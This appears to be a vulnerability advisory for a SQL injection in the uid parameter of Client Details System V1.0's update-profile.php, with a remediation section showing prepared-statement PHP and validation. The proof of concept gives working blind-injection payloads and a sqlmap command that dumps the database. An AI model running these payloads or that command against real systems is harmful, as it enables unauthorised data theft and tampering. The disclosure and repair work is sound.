
Client Details System V1.0 update-profile.php SQL injection #2

@hellonewbie

Description


NAME OF AFFECTED PRODUCT(S)

  • Client Details System

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

SUBMITTER

  • LiuJiying

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • The root cause of the vulnerability is the improper construction of an SQL UPDATE query in the update-profile.php script. The application concatenates the raw, unsanitized uid parameter, taken directly from $_GET, into the SQL query string. Nothing neutralizes quotes or SQL operators, so user-supplied input becomes part of the database command. The core issue is the absence of server-side input validation combined with the failure to use parameterized queries (prepared statements), which would keep SQL logic separate from user data.

Impact

The impact of this vulnerability is critical. An authenticated attacker, by manipulating the uid parameter in the URL, can execute arbitrary SQL commands with the privileges of the web application's database user. This can lead to:

  • Unauthorized Data Manipulation: The attacker can bypass the intended business logic and update, insert, or delete arbitrary records across any table in the database. For example, with a payload such as 1' OR '1'='1 the WHERE clause matches every row, so an attacker could modify every user's profile in a single request.
  • Complete Data Exfiltration: Sensitive information from the entire database can be stolen, including user credentials, personal identifiable information (PII), and other application data, using UNION-based or time-based blind injection techniques.
  • Denial of Service (DoS): The vulnerability could be used to execute resource-intensive or destructive queries (e.g., DROP TABLE if stacked queries are enabled), potentially rendering the database or the entire application unavailable.
  • Full System Compromise: Depending on the database server's configuration and privileges, this flaw could be escalated to achieve remote code execution (RCE) on the underlying server, leading to a complete system takeover.

DESCRIPTION

The "Update Profile" feature within the admin panel is critically vulnerable to SQL Injection. The uid GET parameter, which is intended to specify the unique identifier of the user profile to be modified, is not subjected to any sanitization or validation and is directly embedded into the UPDATE statement. This allows an authenticated attacker to inject malicious SQL code by crafting a malicious uid value in the request URL.

Requires login: the vulnerable page sits in the admin panel, so a valid admin session (the PHPSESSID cookie passed to sqlmap in the command below) is needed to reach it.

Vulnerability details and POC

Vulnerability type:

  • boolean-based blind
  • time-based blind

Vulnerability location:

  • 'uid' parameter

Payload:

```
Parameter: uid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: uid=1' OR NOT 3664=3664 AND 'wMtd'='wMtd

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 4745 FROM (SELECT(SLEEP(5)))ytgU) AND 'ZNhO'='ZNhO
```

## The following are screenshots of some specific information obtained from testing with the sqlmap tool:

```
└─# sqlmap -u "http://localhost/clientdetails/admin/update-profile.php?uid=1" --cookie "PHPSESSID=mjnk939utanl0bo2d5fu94i8bj" --data "Submit=1&fname=a&lname=b&contact=1" -p uid --risk=3 --level=5 --dbms=mysql --technique=BEUST --tamper=space2comment,between,randomcase --batch --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:51:28 /2025-10-09/
```

Attack results

(Screenshots of the sqlmap run are attached to the original issue and are not reproduced here.)

# Suggested repair

1. Immediately Adopt Parameterized Queries (Eliminate SQL Concatenation)

This is the most fundamental and effective fix for SQL injection. A parameterized query sends the SQL text and the user-supplied values to the database separately, so the engine never parses user data as part of the command. In PHP this means mysqli or PDO prepared statements with bound parameters for every value, including the uid in the WHERE clause; escaping with mysqli_real_escape_string() is a weaker fallback and is easy to forget on a single parameter, which is exactly what happened here.

2. Strengthen Input Validation and Type Casting

  • Numeric Validation : For inputs expected to be numbers (like an id ), validate and cast them to integers before use. Note that a plain (int) cast silently turns 1' OR '1'='1 into 1, so it blocks the injection but does not reject the request; pair it with a range check (or use filter_var() with FILTER_VALIDATE_INT) so bad input is refused outright.

```php
// Reject missing or non-positive IDs; (int) also discards anything after the leading digits.
$uid = (int)($_GET['uid'] ?? 0);
if ($uid <= 0) {
    // Handle the case of an invalid ID
    die("Invalid ID specified.");
}
```

  • Format Validation : For data with specific formats like email addresses or phone numbers, use regular expressions or filter_var() for validation.

```php
// filter_var() returns false (not the original string) when the value is not a valid address.
$email = filter_var($_POST['uemail'] ?? '', FILTER_VALIDATE_EMAIL);
if ($email === false) {
    die("Invalid email format.");
}
```

  • Whitelist Validation : If an input value should only be selected from a fixed set (like a dropdown menu), ensure the submitted value is one of the valid options.
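The following is an added example illustrating points 1 and 2 together; it is not code from Client Details System. It shows the concatenation pattern described in the root cause next to a hardened handler that validates the uid as an integer and binds every value through a mysqli prepared statement. The table name tbladmin, the column names, the mysqli handle $con and the 100-character field limit are assumptions.

```php
<?php
// Added example, not the project's own code. Assumed names: table tbladmin,
// columns uid/fname/lname/contact, mysqli connection $con, 100-char field limit.

// Builds the UPDATE the way the vulnerable script does: raw string concatenation.
// Included only to make the injection visible; never use this pattern.
function buildVulnerableUpdate(string $uid, string $fname, string $lname, string $contact): string
{
    return "UPDATE tbladmin SET fname='$fname', lname='$lname', contact='$contact' "
         . "WHERE uid='$uid'";
}
// With uid = "1' OR '1'='1" the WHERE clause becomes  uid='1' OR '1'='1'  and the
// UPDATE touches every row; the boolean- and time-based payloads above work the same way.

// Hardened handler: validate the type of every input first, then bind all values so
// the database receives them as data rather than as part of the SQL text.
function updateProfileSafe(mysqli $con, array $get, array $post): bool
{
    // uid is a numeric key: accept only a positive integer; "1' OR ..." fails here.
    $uid = filter_var($get['uid'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($uid === false) {
        http_response_code(400);
        return false;
    }
    // Profile fields must be present strings within the assumed length limit.
    foreach (['fname', 'lname', 'contact'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field]) || strlen($post[$field]) > 100) {
            http_response_code(400);
            return false;
        }
    }
    $stmt = $con->prepare('UPDATE tbladmin SET fname = ?, lname = ?, contact = ? WHERE uid = ?');
    if ($stmt === false) {
        return false;
    }
    // 'sssi': three strings and one integer, sent to the server separately from the query.
    $stmt->bind_param('sssi', $post['fname'], $post['lname'], $post['contact'], $uid);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Constructed request data mirroring the sqlmap command above; no database is needed
// to see the injected query text.
echo buildVulnerableUpdate("1' OR '1'='1", 'a', 'b', '1'), PHP_EOL;

// Same request through the hardened handler (connection parameters are placeholders):
// $con = new mysqli('localhost', 'app_user', 'secret', 'clientdetails');
// updateProfileSafe($con, ['uid' => "1' OR '1'='1"], ['fname' => 'a', 'lname' => 'b', 'contact' => '1']);
// The integer check rejects the uid before any query is prepared.
```

Binding the uid as an integer is what makes the fix complete: even if validation were skipped, the driver would send the value as a parameter and the quote in the payload could not terminate the string literal, so the boolean and SLEEP() payloads above would have nothing to attach to.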

3. Enforce the Principle of Least Privilege (PoLP) on the Database User

Recommendation: Configure the MySQL user account that the PHP application uses to have the minimum set of permissions required for its operation. This is a crucial defense-in-depth measure. If an SQL injection vulnerability were to be exploited, this principle would limit the potential damage. For example, the application's user should only have SELECT , INSERT , and UPDATE permissions on the specific tables it needs to interact with. It should not have administrative privileges like DROP , ALTER , FILE , or access to other databases on the server.
